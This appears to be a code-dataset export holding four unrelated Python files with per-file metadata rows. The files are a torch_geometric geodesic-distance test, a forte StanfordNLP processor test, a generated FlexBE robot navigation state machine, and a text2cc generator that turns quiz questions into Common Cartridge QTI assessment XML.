from math import sqrt import torch from torch_geometric.utils import geodesic_distance def test_geodesic_distance(): pos = torch.Tensor([[0, 0, 0], [2, 0, 0], [0, 2, 0], [2, 2, 0]]) face = torch.tensor([[0, 1, 3], [0, 2, 3]]).t() out = geodesic_distance(pos, face) expected = [ [0, 1, 1, sqrt(2)], [1, 0, sqrt(2), 1], [1, sqrt(2), 0, 1], [sqrt(2), 1, 1, 0], ] assert torch.allclose(out, torch.tensor(expected)) assert torch.allclose(out, geodesic_distance(pos, face, num_workers=-1)) out = geodesic_distance(pos, face, norm=False) expected = [ [0, 2, 2, 2 * sqrt(2)], [2, 0, 2 * sqrt(2), 2], [2, 2 * sqrt(2), 0, 2], [2 * sqrt(2), 2, 2, 0], ] assert torch.allclose(out, torch.tensor(expected)) src = torch.tensor([0, 0, 0, 0]) dest = torch.tensor([0, 1, 2, 3]) out = geodesic_distance(pos, face, src=src, dest=dest) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, src=src[0:1]) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, dest=dest) expected = [0, 0, 0, 0] assert torch.allclose(out, torch.Tensor(expected))
30.395349
76
0.574598
202
1,307
3.663366
0.143564
0.027027
0.17973
0.178378
0.662162
0.467568
0.445946
0.394595
0.224324
0.224324
0
0.077778
0.24254
1,307
42
77
31.119048
0.669697
0
0
0.235294
0
0
0
0
0
0
0
0
0.176471
1
0.029412
false
0
0.088235
0
0.117647
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc021cb14dd8b84a0a6873924f2194048e2791f0
1,415
py
Python
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
"""This module tests Stanford NLP processors.""" import os import unittest from texar.torch import HParams from forte.pipeline import Pipeline from forte.data.readers import StringReader from forte.processors.stanfordnlp_processor import StandfordNLPProcessor from ft.onto.base_ontology import Token, Sentence class TestStanfordNLPProcessor(unittest.TestCase): def setUp(self): self.stanford_nlp = Pipeline() self.stanford_nlp.set_reader(StringReader()) models_path = os.getcwd() config = HParams({ "processors": "tokenize", "lang": "en", # Language code for the language to build the Pipeline "use_gpu": False }, StandfordNLPProcessor.default_hparams()) self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path), config=config) self.stanford_nlp.initialize() # TODO @unittest.skip("We need to test this without needing to download models " "everytime") def test_stanford_processor(self): sentences = ["This tool is called Forte.", "The goal of this project to help you build NLP " "pipelines.", "NLP has never been made this easy before."] document = ' '.join(sentences) pack = self.stanford_nlp.process(document) print(pack)
36.282051
77
0.638869
152
1,415
5.848684
0.552632
0.074241
0.084364
0
0
0
0
0
0
0
0
0
0.279859
1,415
38
78
37.236842
0.872424
0.071378
0
0
0
0
0.16909
0
0
0
0
0.026316
0
1
0.066667
false
0
0.233333
0
0.333333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc045ba1073202cd1ab4f6738b3709fb28279ff8
5,008
py
Python
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
flexbe_navigation_states/src/flexbe_navigation_states/navigation_sm.py
amsks/generic_flexbe_states
f7be84105d3370c943ed17fc19af672b330726de
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- ########################################################### # WARNING: Generated code! # # ************************** # # Manual changes may get lost if file is generated again. # # Only code inside the [MANUAL] tags will be kept. # ########################################################### from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger from flexbe_states.wait_state import WaitState from flexbe_navigation_states.turn_right_sm import turn_rightSM from flexbe_states.subscriber_state import SubscriberState from flexbe_utility_states.MARCO import Carbonara from flexbe_navigation_states.turn_left_sm import turn_leftSM from flexbe_navigation_states.go_straight_sm import go_straightSM from flexbe_navigation_states.obstacle_avoidance_sm import Obstacle_AvoidanceSM # Additional imports can be added inside the following tags # [MANUAL_IMPORT] # [/MANUAL_IMPORT] ''' Created on Sat Jul 18 2020 @author: TG4 ''' class NavigationSM(Behavior): ''' Integrated behaviour ''' def __init__(self): super(NavigationSM, self).__init__() self.name = 'Navigation' # parameters of this behavior # references to used behaviors self.add_behavior(turn_rightSM, 'turn_right') self.add_behavior(turn_leftSM, 'turn_left') self.add_behavior(go_straightSM, 'go_straight') self.add_behavior(go_straightSM, 'go_straight_2') self.add_behavior(go_straightSM, 'go_straight_3') self.add_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance') # Additional initialization code can be added inside the following tags # [MANUAL_INIT] # [/MANUAL_INIT] # Behavior comments: def create(self): # x:1683 y:419, x:605 y:337 _state_machine = OperatableStateMachine(outcomes=['finished', 'failed']) # Additional creation code can be added inside the following tags # [MANUAL_CREATE] # [/MANUAL_CREATE] with _state_machine: # x:58 y:69 OperatableStateMachine.add('w1', WaitState(wait_time=1), transitions={'done': 's1'}, autonomy={'done': Autonomy.Off}) # x:1090 y:488 OperatableStateMachine.add('turn_right', self.use_behavior(turn_rightSM, 'turn_right'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:55 y:196 OperatableStateMachine.add('s1', SubscriberState(topic='/darknet_ros/bounding_boxes', blocking=True, clear=False), transitions={'received': 'carb1', 'unavailable': 'w1'}, autonomy={'received': Autonomy.Off, 'unavailable': Autonomy.Off}, remapping={'message': 'detected'}) # x:286 y:212 OperatableStateMachine.add('carb1', Carbonara(), transitions={'none': 'go_straight', 'Obstacle': 'Obstacle_Avoidance', 'Left': 'go_straight_2', 'Right': 'go_straight_3'}, autonomy={'none': Autonomy.Off, 'Obstacle': Autonomy.Off, 'Left': Autonomy.Off, 'Right': Autonomy.Off}, remapping={'input_value': 'detected', 'Distance': 'Distance'}) # x:1180 y:246 OperatableStateMachine.add('w2', WaitState(wait_time=1), transitions={'done': 'w5'}, autonomy={'done': Autonomy.Off}) # x:1161 y:64 OperatableStateMachine.add('w5', WaitState(wait_time=1), transitions={'done': 'w1'}, autonomy={'done': Autonomy.Off}) # x:958 y:119 OperatableStateMachine.add('turn_left', self.use_behavior(turn_leftSM, 'turn_left'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:906 y:276 OperatableStateMachine.add('go_straight', self.use_behavior(go_straightSM, 'go_straight'), transitions={'finished': 'w2', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:679 y:118 OperatableStateMachine.add('go_straight_2', self.use_behavior(go_straightSM, 'go_straight_2'), transitions={'finished': 'turn_left', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:715 y:484 OperatableStateMachine.add('go_straight_3', self.use_behavior(go_straightSM, 'go_straight_3'), transitions={'finished': 'turn_right', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) # x:381 y:495 OperatableStateMachine.add('Obstacle_Avoidance', self.use_behavior(Obstacle_AvoidanceSM, 'Obstacle_Avoidance'), transitions={'finished': 's1', 'failed': 'failed'}, autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit}) return _state_machine # Private functions can be added inside the following tags # [MANUAL_FUNC] # [/MANUAL_FUNC]
34.777778
131
0.659145
550
5,008
5.8
0.292727
0.040752
0.028213
0.041379
0.396552
0.29373
0.261442
0.19185
0.168025
0.12163
0
0.027166
0.184105
5,008
143
132
35.020979
0.753549
0.179113
0
0.220588
1
0
0.189487
0.006923
0
0
0
0
0
1
0.029412
false
0
0.117647
0
0.176471
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc070f80801a319fdf697b23e027ce45aa2d558c
26,632
py
Python
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
1
2021-02-12T09:34:07.000Z
2021-02-12T09:34:07.000Z
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (c) 2021, Dana Lehman # Copyright (c) 2020, Geoffrey M. Poore # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion BEFORE_ITEMS = '''\ <?xml version="1.0" encoding="UTF-8"?> <questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd"> <assessment ident="{assessment_identifier}" title="{title}"> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_maxattempts</fieldlabel> <fieldentry>1</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> cc_profile </fieldlabel> <fieldentry> cc.exam.v0p1 </fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> qmd_assessmenttype </fieldlabel> <fieldentry> Examination </fieldentry> </qtimetadatafield> </qtimetadata> <section ident="root_section"> ''' AFTER_ITEMS = '''\ </section> </assessment> </questestinterop> ''' GROUP_START = '''\ <section ident="{ident}" title="{group_title}"> <selection_ordering> <selection> <selection_number>{pick}</selection_number> <selection_extension> <points_per_item>{points_per_item}</points_per_item> </selection_extension> </selection> </selection_ordering> ''' GROUP_END = '''\ </section> ''' TEXT = '''\ <item ident="{ident}" title="{text_title_xml}"> <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>text_only_question</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>0</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry></fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> <presentation> <material> <mattext texttype="text/html">{text_html_xml}</mattext> </material> </presentation> </item> ''' START_ITEM = '''\ <item ident="{question_identifier}" title="{question_title}"> ''' END_ITEM = '''\ </item> ''' ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\ <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>{question_type}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>{points_possible}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry>{original_answer_ids}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> ''' ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '') ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY ITEM_PRESENTATION_MCTF = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_lid ident="response1" rcardinality="Single"> <render_choice> {choices} </render_choice> </response_lid> </presentation> ''' ITEM_PRESENTATION_MCTF_CHOICE = '''\ <response_label ident="{ident}"> <material> <mattext texttype="text/html">{choice_html_xml}</mattext> </material> </response_label>''' ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple') ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE ITEM_PRESENTATION_SHORTANS = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_ESSAY = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_UPLOAD = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> </presentation> ''' ITEM_PRESENTATION_NUM = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib fibtype="Decimal"> <response_label ident="answer1"/> </render_fib> </response_str> </presentation> ''' ITEM_RESPROCESSING_START = '''\ <resprocessing> <outcomes> <decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/> </outcomes> ''' ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{answer_xml}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\ <varequal respident="response1">{answer_xml}</varequal>''' ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\ <varequal respident="response1">{ident}</varequal>''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\ <not> <varequal respident="response1">{ident}</varequal> </not>''' ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY = '''\ <respcondition continue="No"> <conditionvar> <other/> </conditionvar> </respcondition> ''' ITEM_RESPROCESSING_END = '''\ </resprocessing> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\ <itemfeedback ident="general_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\ <itemfeedback ident="correct_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\ <itemfeedback ident="general_incorrect_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\ <itemfeedback ident="{ident}_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str: ''' Generate assessment XML from Quiz. ''' xml = [] xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier, title=title_xml)) for question_or_delim in quiz.questions_and_delims: if isinstance(question_or_delim, TextRegion): xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}', text_title_xml=question_or_delim.title_xml, assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}', text_html_xml=question_or_delim.text_html_xml)) continue if isinstance(question_or_delim, GroupStart): xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}', group_title=question_or_delim.group.title_xml, pick=question_or_delim.group.pick, points_per_item=question_or_delim.group.points_per_question)) continue if isinstance(question_or_delim, GroupEnd): xml.append(GROUP_END) continue if not isinstance(question_or_delim, Question): raise TypeError question = question_or_delim xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}', question_title=question.title_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices) elif question.type == 'numerical_question': item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = f'text2qti_numerical_{question.id}' elif question.type == 'essay_question': item_metadata = ITEM_METADATA_ESSAY original_answer_ids = f'text2qti_essay_{question.id}' elif question.type == 'file_upload_question': item_metadata = ITEM_METADATA_UPLOAD original_answer_ids = f'text2qti_upload_{question.id}' else: raise ValueError #Type Change for Schoology CC Import if question.type == 'multiple_choice_question': typechange = 'cc.multiple_choice.v0p1' elif question.type == 'true_false_question': typechange = 'cc.true_false.v0p1' elif question.type == 'short_answer_question': typechange = 'cc.fib.v0p1' elif question.type == 'multiple_answers_question': typechange = 'cc.multiple_response.v0p1' elif question.type == 'essay_question': typechange = 'cc.essay.v0p1' else: typechange = question.type xml.append(item_metadata.format(question_type=typechange, points_possible=question.points_possible, original_answer_ids=original_answer_ids, assessment_question_identifierref=f'text2qti_question_ref_{question.id}')) if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'): if question.type in ('true_false_question', 'multiple_choice_question'): item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE item_presentation = ITEM_PRESENTATION_MCTF elif question.type == 'multiple_answers_question': item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE item_presentation = ITEM_PRESENTATION_MULTANS else: raise ValueError choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml) for c in question.choices) xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices)) elif question.type == 'short_answer_question': xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml)) elif question.type == 'numerical_question': xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml)) elif question.type == 'essay_question': xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml)) elif question.type == 'file_upload_question': xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml)) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question'): correct_choice = None for choice in question.choices: if choice.correct: correct_choice = choice break if correct_choice is None: raise TypeError resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) else: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'short_answer_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml)) varequal = [] for choice in question.choices: varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml)) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'multiple_answers_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) varequal = [] for choice in question.choices: if choice.correct: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}')) else: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'numerical_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK) if question.correct_feedback_raw is None: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK else: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml, num_exact=question.numerical_exact_html_xml, num_max=question.numerical_max_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'essay_question': xml.append(ITEM_RESPROCESSING_START) xml.append(ITEM_RESPROCESSING_ESSAY) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'file_upload_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question', 'numerical_question', 'essay_question', 'file_upload_question'): if question.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml)) if question.correct_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): for choice in question.choices: if choice.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL.format(ident=f'text2qti_choice_{choice.id}', feedback=choice.feedback_html_xml)) xml.append(END_ITEM) xml.append(AFTER_ITEMS) return ''.join(xml)
40.474164
260
0.629769
2,487
26,632
6.386409
0.081624
0.087767
0.052131
